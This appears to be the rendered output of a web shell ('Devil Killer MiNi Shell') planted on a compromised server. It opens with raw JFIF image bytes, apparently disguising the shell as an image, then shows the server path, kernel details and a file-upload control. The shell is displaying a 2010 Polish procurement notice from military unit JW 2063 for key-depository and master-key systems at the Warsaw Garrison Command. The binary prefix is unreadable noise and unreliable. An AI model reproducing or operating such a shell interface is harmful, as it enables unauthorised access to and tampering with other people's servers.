JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100924/304840-N-2010.html

<p class="kh_header"><b>Warszawa: Zakup i instalacja systemu depozytorów kluczy dla Dowództwa Garnizonu Warszawa</b><br>
<b>Numer ogłoszenia: 304840 - 2010; data zamieszczenia: 24.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2063 , ul. Banacha 2, 02-097 Warszawa, woj. mazowieckie, tel. 022 6824581, 6824375, 6824121, faks 022 6824108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jw2063.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i instalacja systemu depozytorów kluczy dla Dowództwa Garnizonu Warszawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Systemu depozytorów kluczy, o następujących wymaganiach technicznych: 
1)urządzenie musi legitymować się badaniami na znak zgodności z CE;
2)ma posiadać certyfikat ABW lub SKW, klasyfikujący go do przechowywania informacji niejawnych,  oznaczonych klauzulą co najmniej Tajne;
3)do deponowania kluczy w depozytorze mają być stosowane specjalne cylindry, zabezpieczające przed odczytaniem profilu i nacięć na grani roboczej klucza;
4)każdy klucz ma mieć jednoznacznie określony numer stanowiska, w którym będzie deponowany, a kod cylindra deponującego ma odpowiadać kodowi klucza (tzw. mechaniczna identyfikacja kluczy);
5)każda próba siłowego pobrania zdeponowanego klucza powinna prowadzić do jego nieodwracalnego uszkodzenia.
6)depozytor ma mieć możliwość współpracy z różnymi typami czytników kart zbliżeniowych;
7)zagwarantowane muszą być trzy tryby (sposoby) identyfikacji osoby (użytkownika): tylko PIN-kod, tylko karta, karta i PIN-kod;
8)maksymalna liczba użytkowników (w jednym depozytorze) nie może być mniejsza niż 990, w sieci 32 depozytorów - 9990;
9)do pobrania z depozytora szczególnie ważnego klucza, wymagana będzie podwójna identyfikacja -  np. pracownika ochrony i innego, upoważnionego użytkownika;
10)każdy depozytor (moduł sterujący) powinien mieć możliwość nadzorowania i zarządzania co najmniej 192 stanowiskami różnego typu (możliwość tworzenia tzw. systemów mieszanych), takimi jak: gniazda kluczowe, skrytki drzwiczkowe - opcjonalnie z dodatkowymi pojemnikami na pęki kluczy (obecność pojemnika w skrytce jest monitorowana), specjalne skrytki na tzw. klucze długie, skrytki rurowe z możliwością zastosowania do ich otwarcia zasady czterech oczu; 
11)w depozytorze muszą zostać przewidziane stanowiska umożliwiające deponowanie kluczy nietypowych o długości do ok. 200 mm, np. do sejfów, w tym przypadku - klucze te wyposażone są w specjalne breloki, umożliwiające ich programową i optyczną (LED) identyfikację zdeponowania na właściwym stanowisku, a po zdeponowaniu znajdują się w zamykanej skrytce; 
12)depozytor ma posiadać funkcję tzw. śluzy kluczowej zewnętrznej, uniemożliwiająca wyniesie klucza lub pojemnika z kluczami poza obiekt (dotyczy czytników pracujących w protokole Wieganda); 
13)depozytor ma posiadać funkcję tzw. śluzy kluczowej wewnętrznej, uniemożliwiającej - po pobraniu szczególnie ważnego klucza (lub kluczy) - pobranie innego, aż do czasu zdeponowania pierwszego; 
14)depozytor musi być zabezpieczony przed próbami wczytywania obcej karty lub wyszukiwaniem PIN-kodu; 
15)depozytor powinien mieć możliwość wywołania tzw. cichego alarmu; 
16)urządzenie powinno posiadać co najmniej 5 wyjść bezpotencjałowych umożliwiających przyłączenie depozytora m.in. do systemu alarmowego, systemu rejestracji obrazu, itp.; 
17)depozytor musi rejestrować we własnej, nieulotnej pamięci co najmniej 8000 ostatnich zdarzeń oraz pamiętać konfigurację urządzenia (np. na czas utraty komunikacji z komputerem administratora); 
18)system (depozytor + oprogramowanie na PC) powinien mieć możliwość przeglądania i sporządzania wydruków wg różnych kryteriów (np. dla wybranego zakresu czasowego, dla wybranego stanowiska, dla danego użytkownika, itd.); 
19)oprogramowanie komputerowe powinno umożliwić obsługę co najmniej 32 depozytorów połączonych w sieć, umożliwiająca ich bieżące administrowanie, odczyt historii zdarzeń, automatyczne raporty, zwalnianie/otwieranie stanowisk, itd.; 
20)w depozytorze powinna istnieć możliwość przypisania użytkownikowi co najmniej dwóch z 8 przedziałów czasowych, aktywowanych w wybrane dni tygodnia; 
21)system (depozytor + oprogramowanie na PC) ma posiadać funkcję tzw. kluczy przetrzymanych, tj. takich które po zdefiniowanym przez administratora czasie (np. 8 lub 12 godzin, itp.) - nie zostały zdeponowane w urządzeniu, i których brak w depozytorze generuje alarm; 
22)system (depozytor + oprogramowanie) ma posiadać funkcję wydawania (przez administratora) kluczy na odległość - realizowaną z poziomu komputera administratora dla osób, którym nie została przydzielona karta lub PIN-kod; 
23)system (depozytor + oprogramowanie) ma umożliwiać czasową deaktywację a następnie automatyczną aktywację użytkowników w systemie, np. na czas ich urlopu; 
24)depozytor musi posiadać funkcję tzw. oficera dyżurnego, upoważnionego jedynie do zdawania kluczy; 
25)urządzenie powinno posiadać możliwość nadania wybranym kluczom i lub użytkownikom statusu stale monitoro-wanych; 
2.Urządzenia do zarządzania depozytorami kluczy, o następujących wymaganiach: 
1)wyrób referencyjny - Depozytor Kluczy Kaba DPE-C16S, lub równoważny; 
2)urządzenia wchodzące w skład systemu depozytorów kluczy: 
-depozytor kluczy  (Moduł Główny) (16-kluczy) - 11 szt.;
-depozytor kluczy (Moduł Dodatkowy) (16-kluczy) - 3 szt.;
-depozytor kluczy (Moduł Dodatkowy ) - 2 szt.;
-depozytor kluczy (Moduł Dodatkowy) - 3 szt.;
-wkładki cylindryczne specjalne deponujące klucze BMZ - 256 szt.
-pojemniki na klucze z nadzorem obecności pojemników w depozytorze -  40 szt.

-czytnik ANDAVER typ ASR 702w -  12 szt.
-zasilanie awaryjne - Zestaw Akumulatorów 12V 2x17Ah - 11 zestawy;
-terminal logowania kart przy komputerze - 1szt.
-uruchomienie depozytora wraz z wstępną konfiguracją oraz szkoleniem administratora systemu (konfiguracja - do 50-osób
-konwerter TCP/IP -  1 szt.
-oprogramowanie do zarządzania depozytorami licencja otwarta na 32 mod. ster. - 1 szt.
3)urządzenia do zarządzania systemem depozytorów kluczy: 
-komputer PC nie gorszy niż: Komputronik BS-02BBB by Chieftec; Komputery PC: 350W (ATX);Urządzenia mobilne: Al l in One; Podzespoły PC: 320 GB SATA II; Podzespoły PC: DDR2 2GB 800MHz;Podzespoły PC: 1GB DDR2 800MHz Kingston; Podzespoły PC: 92 mm; Podzespoły PC: Nero 8 Essentials; Podzespoły PC: DVD+-RW; Peryferia: Logitech (optyczna, przewodowa);Peryferia: klasyczna;Peryferia: standardowa Komputronik; Komputery PC: Microsoft Windows 7 Home Premium;Komputery PC: ESET Smart Security - licencja na 180 dni; Podzespoły PC: Asus P5G41-M SI; Peryferia: Kabel zasilający 1,8m; Podzespoły PC: Intel Pentium Dual Core E6500 2.93 GHz BOX; DC E6500 | RAM: 3GB | HDD: 320GB | GeForce 220GT | >XP karta sieciowa światłowodowa
-monitor LCD 19
-notebook nie gorszy niż: przekątna ekranu LCD: 15.60 cali; nominalna rozdzielczość LCD: 1366 x 768 pikseli; procesor: IntelR PentiumR; model procesora: ULV 743 (1.3 MHz, 1 MB cache); ilość rdzeni: 2.00 szt.; wielkość pamięci RAM: 4 GB; typ zastosowanej pamięci RAM: DDR3 (1066 MHz); pojemność dysku twardego: 320 GB; napęd optyczny: DVD+/-RW DL; zewn. układ graficzny: nie; karta graficzna: GeForce 220GT; wyjścia karty graficznej: wyjście HDMI, wyjście D-Sub; czas pracy na akumulatorze (normatywny): 4.00 godz.; czytnik kart pamięci: MS-Pro, MMC, Memory Stick, SD; komunikacja: LAN 100 Mbps, WiFi IEEE 802.11a/b/g/n; interfejsy: 3x USB; zainstalowany system operacyjny: Windows 7 Home Premium; szerokość: 377.00 mm; głębokość: 251.00 mm; wysokość: 24.00 mm; waga: 2.40 kg; 
-Microsoft Office Basic 2007 W32 Polish OEM (MLK) - 2 szt.; 
-drukarka atramentowa nie gorsza niż: Technologia druku: atramentowa; maks. rozmiar nośnika: A4; rozdzielczość druku w czerni: 4800 x 1200 dpi; rozdzielczość druku w kolorze: 1200 x 4800 dpi; maks. szybkość druku mono: 29.00 str.min.; maks. szybkość druku kolor: 23.00 str./min.; typ skanera: skaner typu CIS; rozdzielczość skanera: 1200 x 2400 dpi; szybkość kopiarki w czerni: 29.00 str./min.; szybkość kopiarki w kolorze: 23.00 str./min.; interfejs: USB 2.0; normatywne obciążenie: 3000.00 str.mies.; 
3.Montaż systemu centralnego otwierania mechanicznej kontroli dostępu MASTER KEY w Dowództwie Garnizonu Warszawa (wyrób referencyjny Gego pExtra 6-zastawkowy, lub równoważny, o następujących wymaganiach:  
1)Urządzenia wchodzące w skład systemu centralnego otwierania MASTER KEY
-wkładka dwustronna długości całkowitej - średniej 65 mm - 256 szt.
-klucz generalny obiektu - 1 szt.
-klucz główny obiektu - 11 szt.
-klucz grupowy - 44 szt.
-dostosowanie zamków do systemu Master Key - 15 szt.
-inwentaryzacja i montaż wkładek na obiekcie - 256 szt.
2)System Master Key ma być zbudowany w oparciu o wkładki co najmniej 6-zastawkowe, które (jako tzw. zamknięcia pojedyncze) legitymują się certyfikatem klasy 6 w zakresie klasy zabezpieczenia wg PN-EN-1303:2007 oraz  klasy C w zakresie odporności na włamanie, wydanym (wyłącznie)  przez Instytut Mechaniki Precyzyjnej i Centralne Laboratorium Kryminalistyczne Komendy Głównej   Policji (oferent jest zobowiązany do przedłożenia potwierdzonej kopii ww. certyfikatu);
3)w momencie podpisania umowy na realizację zlecenia - kształt klucza musi być na terenie Polski chroniony patentem, z okresem ważności przez co najmniej jeszcze 10 lat (oferent jest zobowiązany do załączenia stosownego dokumentu z Urzędu Patentowego RP); 
4)do budowy systemu Master Key powinna być użyta tzw. rodzina profili, składająca się z co najmniej 18 (różnych) profili szeregowych (obowiązkiem oferenta jest przedstawienie dokumentacji technicznej ww. rodziny profili);  
5)użyta do budowy systemu Master Key rodzina profili  musi być prawnie chroniona (patentowa ochrona klucza) i niedostępna w wolnym obrocie surówkami kluczy; 
6)w pomieszczeniach wskazanych przez zamawiającego wkładki systemowe muszą być wykonane w sposób zgodny z wymaganiami VdS; 
7)wkładki systemu Master Key powinny mieć specjalne zabezpieczenia przed przewierceniem, zarówno w rdzeniu, jak i w obudowie; 
8)wkładki systemu Master Key muszą posiadać specjalne zabezpieczenia przed otwarciem tzw. metodą młoteczkowania; 
9)klucze systemu Master Key muszą posiadać specjalne zabezpieczenia uniemożliwiające ich nielegalne skopiowanie na maszynkach do dorabiania kluczy Fa. Bosch i ich polskiej odmianie, typu Ola; 
10)system zamknięć użyty do zbudowania Systemu Master Key powinien umożliwiać wykonanie w ww. systemie - obok wkładek w tzw. europrofilu (jedno- lub dwustronnych) do zamków podklamkowych, także m.in: cylindrów do zamków wierzchnich, specjalnych cylidrów do montażu w płytach metalowych, cylindrów pracujących w trybie przełącznika (np. do wind), cylindrów do zamków meblowych; 
11)system musi mieć możliwość rozbudowy o kolejne wkładki i klucze.
4.Montaż systemu światłowodowego do podłączenia systemu depozytorów kluczy,  o następującym ukompletowaniu urządzeń: 
1)kabel 2G50 - 3000 m.
2)peszel LSOH - 3000 m.
3)korytko kablowe 2 m - 33 szt.
4)switch nie gorszy niż 16x100Ethernet port 2 MM S.C. + 2 port x RJ45 - 1 szt,
5)konwerter S.C. - 13 szt.
6)karta sieciowa światłowodowa S.C. MM 100 Ethernet - 1 szt. 
7)patchcord duplex S.C.-ST MM50 2m - 5 szt.
8)patchcard UTP RJ45 10m - 15 szt.
5.Odbioru technicznego dostawy i montażu całego systemu dokona komisja w składzie przedstawiciele bezpośredniego użytkownika tj. z JW 2063 - 2 osoby, z DGW - 2 osoby na podstawie protokołu technicznego odbioru potwierdzający stan ilościowy i jakościowy zamówienia zgodny z założonymi wymaganiami technicznymi zamówienia. Protokół zawierać będzie czytelne podpisy członków komisji wraz z indywidualnymi pieczątkami służbowymi oraz pieczęć herbową DGW będącego 
głównym użytkownikiem systemu. Protokół musi zawierać informacje o podstawowych parametrach pracy w warunkach przewidzianych do eksploatacji. 
6.WYKONAWCA udzieli minimum 12 miesięcy gwarancji na podzespoły i sprzęt dostarczony przez WYKONAWCĘ chyba, że producent oferuje korzystniejsze warunki bez dodatkowych opłat i prowizji. Termin gwarancji liczy się od dnia odbioru technicznego przez przedstawiciela UŻYTKOWNIKA, co potwierdza się protokołem przyjęciem - przekazania. Wady jakościowe dotyczące wykonania usługi UŻYTKOWNIK zgłasza WYKONAWCY w okresie gwarancyjnym niezwłocznie po ich wykryciu na podstawie ustalonego formularza reklamacyjnego i przekazuje towar do jego dyspozycji. Reklamacja winna być załatwiona na terenie kraju nie później niż w ciągu 14 dni w miejscu zamontowania urządzenia, licząc od daty otrzymania protokołu, chyba że usterka powoduje konieczność wymiany podzespołu dostarczonego w miejsce wymontowanego przez WYKONAWCĘ reklamacji. Odbiór i dostarczenie towaru do i z naprawy odbywa się na koszt WYKONAWCY. Okres gwarancyjny przedłuża się o czas przestoju systemu z powodu uszkodzeń niezawinionych przez UŻYTKOWNIKA.  Z usunięcia wad i usterek WYKONAWCA i UŻYTKOWNIK sporządzają protokół potwierdzający zgodność parametrów technicznych oraz wpisują w nim nowy termin zakończenia gwarancji całego systemu. 
7.Zakwestionowany (wadliwy towar) może podlegać ekspertyzie technicznej, a koszty sporządzenia ekspertyzy ponosi strona której ocena jakości okazała się wadliwa. 
8.Przedmiot zamówienia przyjmuje się za wykonany po przekazania sprzętu i protokolarnym przyjęciu bez zastrzeżeń przez UŻYTKOWNIKA, tj. Dowództwo Garnizonu Warszawa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.70.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)ważnej koncesji wydanej przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie ochrony osób i mienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	na potwierdzenie wiedzy i doświadczenia Zamawiający wymaga załączenia wykazu wykonywanych co najmniej 3 dostaw/usług w zakresie niezbędnym do wykazania spełniania  warunku wiedzy i doświadczenia  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, na kwotę nie mniejszą niż cena brutto składanej oferty (na formularzu określonym w zał. nr 4 do SIWZ), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-wykazu osób, które będą uczestniczyć w realizacji zamówienia z  udokumentowaniem ich doświadczenia i kwalifikacji zawodowych (formularz  załącznik nr 5). Do wykazu, zał. nr 5, należy dołączyć następujące kserokopie dokumentów  wraz z ich numerami (o ile występują) poświadczone przez Wykonawcę za zgodność z oryginałem:
a)aktualne Poświadczenie bezpieczeństwa osobowego upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą Poufne, 
b)zaświadczenie o przeszkoleniu z zakresu ochrony  informacji niejawnych, 
c)licencje pracownika zabezpieczenia technicznego I lub II stopnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)opłaconej polisy, wraz z dowodem jej opłacenia a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż cena brutto składanej oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
